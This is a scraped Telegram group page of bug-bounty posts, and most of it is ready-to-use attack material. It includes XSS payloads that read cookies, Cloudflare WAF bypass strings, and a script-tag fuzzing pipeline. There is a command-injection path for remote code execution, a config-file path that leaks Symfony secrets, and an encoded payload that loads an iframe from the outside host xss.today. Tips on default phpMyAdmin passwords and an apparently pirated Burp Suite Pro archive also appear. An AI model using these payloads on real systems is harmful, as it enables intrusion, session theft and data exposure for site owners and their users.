en
Feedback
Termux All Command [Telegram Group]

Termux All Command [Telegram Group]

Open in Telegram

Hello This Is Termux All Command Official Telegram Group. Here Share All Kind of Resourses. It is Also backup of Facebook Page Telegram Channel >> https://t.me/termuxcommandfull Facebook Page >> https://www.facebook.com/termux.command.full

Show more
1 184
Subscribers
+124 hours
+157 days
+4830 days
Posts Archive
My four XSS vulnerability reports were triaged. I reported them to a single program on HackerOne. Tips: * if you were able to find a vulnerable parameter try to dork for it in a different assets, google dorks used: site:*.target.com inurl:"?name="and site:*.target.com inurl:"?type=" * If you come across a sub-domain that says "You do not have permission to view this directory or page": https://sub.target[.]com/ --> 403 (Forbidden) https://sub.target[.]com/%3f/ --> 200 (OK) Payload Used: </div><img src="x" onerror="alert(document.cookie)"/><div><p>

All Security Plugins.zip636.50 MB

burpsuite_pro_v2024.6.7z699.48 MB

Top technical skills for penetration tester specialists โ— Nmap โ— Kali Linux โ— BackTrack โ— SamuraiWTF โ— Parrot โ— Metasploit โ— Kismet โ— THC Hydra โ— soapUI โ— AppScan โ— ZAP โ— SOOS โ— Canvas โ— QualysGuard โ— ArcSight โ— Splunk โ— Archer โ— Nessus โ— Nmap โ— Nikto โ— Wireshark โ— WebInspect โ— Netsparker โ— Fortify โ— Ounce Labs โ— Acunetix โ— SQLmap โ— SAST โ— DAST โ— Social-Engineer Toolkit โ— Objective-C โ— Java โ— C# โ— C โ— C++ โ— Python โ— SQL โ— ASP.NET โ— PHP โ— JavaScript โ— Bash โ— Ruby โ— REST โ— Powershell โ— XML โ— YAML โ— JSON โ— Protocols: FTP/POP3/IMAP/SMB/SSH โ— TCP/IP โ— Windows/iOS/Android/Linux/Unix โ— Firewalls โ— Networks โ— Servers โ— Cloud Infrastructures โ— CI/CD โ— Keyloggers โ— Cryptography โ— IDS/IPS โ— Technical writing โ— Hardware โ— OSI layer model connect for more post- https://linktr.ee/Harshleen_Chawla

CloudFlare XSS protection WAF Bypassed ! payload used: <Img Src=OnXSS OnError=confirm(document.cookie)> #bugbounty #infosec

๐Ÿž Bug Bounty Tip: ๐Ÿ•ต๏ธโ€โ™‚๏ธ If you find Web frameworks like Symfony, add /app_dev.php/_profiler/open?file=app/config/parameters.yml to the wordlist, and you may get juicy data. Enjoy! ๐Ÿš€ #bugbountytips #bugbountytip #cybersecurity #ethicalhacking

๐ŸŽค Practical Ethical Hacking From Beginner To Advance Course โšก๏ธ โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ” ๐Ÿ’ฏ A Complete FREE Course โ˜๏ธ DOWNLOAD LINK : https://drive.google.com/drive/mobile/folders/1if6MCeBCj8sxWwJIKhtgwU0GBuBW8uLx โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ” โžก๏ธ ๐†๐ข๐ฏ๐ž ๐‘๐ž๐š๐œ๐ญ๐ข๐จ๐ง๐ฌ ๐Ž๐ง ๐„๐ฏ๐ž๐ซ๐ฒ ๐๐จ๐ฌ๐ญ ๐ŸŸฉ โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ” ๐ŸŽ Share Us For More -

Online tools for automating work with dorks (Google and beyond): ๐Ÿ”…dorki.io ๐Ÿ”…https://lnkd.in/ghpygKqw ๐Ÿ”…dorksearch.com ๐Ÿ”…dorkme.com ๐Ÿ”…dorkgenius.com ๐Ÿ”…dorks.faisalahmed.me hashtag#bugbounty hashtag#bugbountytips

Access OpenAI ChatGPT4o for free! Thanks me later ๐Ÿ˜‰ Just translate the language from hashtag#Korean to hashtag#English Here's the website link :- https://wrtn.ai/ Join the community of warriorโ€™s :- https://lnkd.in/eurggv4a

Hii Bug hunters I submitted 3x XSS One in Referer Tips : 1) Subfinder -d target.com -all -o subdomains.txt 2) cat subdomains.txt | httprobe | tee -a host.txt 3) cat host.txt | hakrawler | tee -a endpoint.txt cat host.txt | waybackurls | tee -a endpoint.txt 4) cat endpoint.txt | qsreplace %27"></a><โ€‹/script></title></form></span><โ€‹/meta><โ€‹/style></iframe></noscript></textarea></xmp></pre><โ€‹ScRiPt>alert(/Hacked%20by%20ahmad/)<โ€‹/sCrIpT> | tee -a xss_fuzz.txt 5) cat xss_fuzz.txt | freq | tee -a possible_xss.txt

Make sure you have disabled account registration on your WordPress site's '/๐ฐ๐ฉ-๐ฅ๐จ๐ ๐ข๐ง.๐ฉ๐ก๐ฉ?๐š๐œ๐ญ๐ข๐จ๐ง=๐ซ๐ž๐ ๐ข๐ฌ๐ญ๐ž๐ซ' ๐ฉ๐š๐ ๐ž. This vulnerability allows threat actors to register an account, potentially ๐ ๐ซ๐š๐ง๐ญ๐ข๐ง๐  ๐ญ๐ก๐ž๐ฆ ๐š๐๐ฆ๐ข๐ง๐ข๐ฌ๐ญ๐ซ๐š๐ญ๐ข๐ฏ๐ž ๐ฉ๐ซ๐ข๐ฏ๐ข๐ฅ๐ž๐ ๐ž๐ฌ and enabling them to ๐ฎ๐ฉ๐ฅ๐จ๐š๐ ๐ฌ๐ก๐ž๐ฅ๐ฅ๐ฌ. I've tested this vulnerability ( reported by @x0xr2r ) , and it appears to be exploitable on some sites. However, a fix is available, so patching your site is crucial. A ๐†๐จ๐จ๐ ๐ฅ๐ž search suggests there are still many vulnerable sites.

๐Ÿšจ XSS Hunting from WaybackURLS ๐Ÿ” Payload : waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls-xss.txt | sort -u -o urls-xss.txt && cat urls-xss.txt | kxss credit : gudetama_bf #bugbountytips #bugbounty

Story of very quick RCE ๐Ÿ“ โ€ข Target/cgi-bin/dmt/reset.cgi?db_prefix=%26id%26 You can to add this paths for ur wordlist โ€ข cgi-bin/dmt/reset.cgi?db_prefix=%26id%26 โ€ข cgi-bin/reset.cgi?db_prefix=%26id%26 fuzzing as well โ€ข cgi-bin/FUZZ.cgi?FUZZ=%26id%26 #bugbountytips โค๏ธ

Two P3 after successfully bypassing the Cloudflare WAF on a private program. A simple SVG-based payload proved effective. ๐Ÿ˜Ž๐Ÿ’ช Payload: โš™๏ธ "%3cSvg%20Only%3d1%20OnLoad%3dconfirm(1)%3e" #bugbountytips #infosec

jdk-21.0.2_windows-x64_bin.msi162.70 MB

Bug: Cross Site Scripting Organization: HP Tip: ><โ€‹script>alert(document.domain)<โ€‹/script> โœ˜ "})";alert(document.domain)// โœ”๏ธ "}); closes an existing JavaScript function or HTML attribute. // used to comment out the rest of the code to prevent syntax errors

How i am hunting for phpmyadmin logins:- nuclei -l live-subs.txt -t nuclei-templates/http/exposed-panels/phpmyadmin-panel.yaml ## Then :- - Test for default creds : root & password,..etc - Fuzzing - Test SQLi - Response Manipulation

encoded xss payload : %3Cdiv%20id%3D%22load%22%3E%3C%2Fdiv%3E%3Cscript%3Evar%20i%20%3D%20document.createElement%28%27iframe%27%29%3B%20i.style.display%20%3D%20%27none%27%3B%20i.onload%20%3D%20function%28%29%20%7B%20i.contentWindow.location.href%20%3D%20%27%2F%2Fxss.today%27%3B%20%7D%3B%20document.getElementById%28%27load%27%29.appendChild%28i%29%3B%3C%2Fscript%3E